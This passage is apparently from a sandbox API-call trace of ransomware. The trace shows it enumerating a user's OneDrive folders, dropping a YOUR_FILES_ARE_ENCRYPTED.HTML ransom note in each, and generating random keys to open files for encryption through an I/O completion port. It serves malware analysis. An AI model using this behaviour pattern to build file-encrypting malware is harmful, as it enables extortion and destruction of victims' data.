lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6030330, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa61d3250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa61d3250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0160.008] FindNextFileW (in: hFindFile=0x42f3280, 
lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa61d3250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa61d3250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa61d3250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x110a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.008] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.008] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.008] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.008] lstrlenW (lpString=".mui") returned 4 [0160.008] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.008] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa61d3250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa61d3250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa61d3250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x110a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.008] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.008] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.008] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.009] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.011] CloseHandle (hObject=0x5a8) returned 1 [0160.011] GetProcessHeap () returned 0x270000 [0160.012] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.012] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa61d3250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa639c2d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa639c2d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="as-in", cAlternateFileName="")) returned 1 [0160.012] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in") returned 77 [0160.012] GetProcessHeap () returned 0x270000 [0160.012] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.012] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in" [0160.012] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in\\*" [0160.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa61d3250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa639c2d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa639c2d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.013] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa61d3250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa639c2d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa639c2d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0160.013] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa639c2d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa639c2d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa639c2d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.013] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in\\FileSync.LocalizedResources.dll.mui") returned 113 [0160.013] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.013] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.013] lstrlenW (lpString=".mui") returned 4 [0160.013] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.013] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa639c2d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa639c2d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa639c2d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.013] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.013] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\as-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.014] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.016] CloseHandle (hObject=0x5a8) returned 1 [0160.016] GetProcessHeap () returned 0x270000 [0160.017] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.017] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3e449b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3e449b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3e449b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x123c, dwReserved0=0x0, dwReserved1=0x60, cFileName="AutoPlayLogo.png", cAlternateFileName="AUTOPL~1.PNG")) returned 1 [0160.017] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png") returned 88 [0160.017] lstrcmpW (lpString1="AutoPlayLogo.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.017] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0160.017] lstrlenW (lpString=".png") returned 4 [0160.017] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0160.017] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\autoplaylogo.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0160.018] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=4668) returned 1 [0160.018] GetProcessHeap () returned 0x270000 [0160.018] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0160.025] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="A6") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="48") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="CF") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="E9") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="9E") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="E6") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="11") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="3C") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="3F") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="94") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="A3") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="41") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="F4") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="5D") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="02") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="5E") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="24") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="9C") returned 2 
[0160.026] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="D7") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="31") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="C3") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="19") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="E3") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="ED") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="A7") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="7F") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="44") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="CC") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="24") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="51") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="E5") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="35") returned 2 [0160.027] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png" [0160.027] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.027] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0160.027] 
FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3e6ab10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3e6ab10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3e6ab10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x5d8f6, dwReserved0=0x0, dwReserved1=0x60, cFileName="AutoPlayOptIn.gif", cAlternateFileName="AUTOPL~1.GIF")) returned 1 [0160.027] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif") returned 89 [0160.027] lstrcmpW (lpString1="AutoPlayOptIn.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.027] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0160.027] lstrlenW (lpString=".gif") returned 4 [0160.028] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0160.028] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\autoplayoptin.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0160.028] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=383222) returned 1 [0160.028] GetProcessHeap () returned 0x270000 [0160.028] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0160.030] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="0F") returned 2 [0160.030] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: 
param_1="35") returned 2 [0160.030] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="43") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="C7") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="72") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="EC") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="EC") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="BA") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="D7") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="98") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="66") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="3A") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="16") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="AD") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="33") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="91") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="CC") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="A8") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="A0") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="65") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="34") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="3F") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="B7") returned 2 [0160.031] wsprintfW (in: 
param_1=0x4ebd16e, param_2="%02X" | out: param_1="B3") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="52") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="50") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="59") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="9D") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="EB") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="80") returned 2 [0160.032] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="E3") returned 2 [0160.032] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="50") returned 2 [0160.032] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif" [0160.032] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.032] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0160.033] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3e6ab10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3e6ab10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3e6ab10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x27f2, dwReserved0=0x0, dwReserved1=0x60, cFileName="AutoPlayOptIn.png", 
cAlternateFileName="AUTOPL~2.PNG")) returned 1 [0160.033] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png") returned 89 [0160.033] lstrcmpW (lpString1="AutoPlayOptIn.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.033] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0160.033] lstrlenW (lpString=".png") returned 4 [0160.033] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0160.033] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\autoplayoptin.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0160.034] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=10226) returned 1 [0160.034] GetProcessHeap () returned 0x270000 [0160.034] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0160.037] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="E2") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="11") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="B8") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="DF") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="81") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="BC") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="15") returned 2 
[0160.037] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="18") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="F9") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="C9") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="05") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="54") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="6F") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="21") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="6E") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="CD") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="AF") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="71") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="44") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="61") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="BF") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="02") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="77") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="F6") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="5E") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="FA") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="14") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="15") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: 
param_1="22") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="C0") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="30") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="0B") returned 2 [0160.038] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png" [0160.038] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.038] PostQueuedCompletionStatus 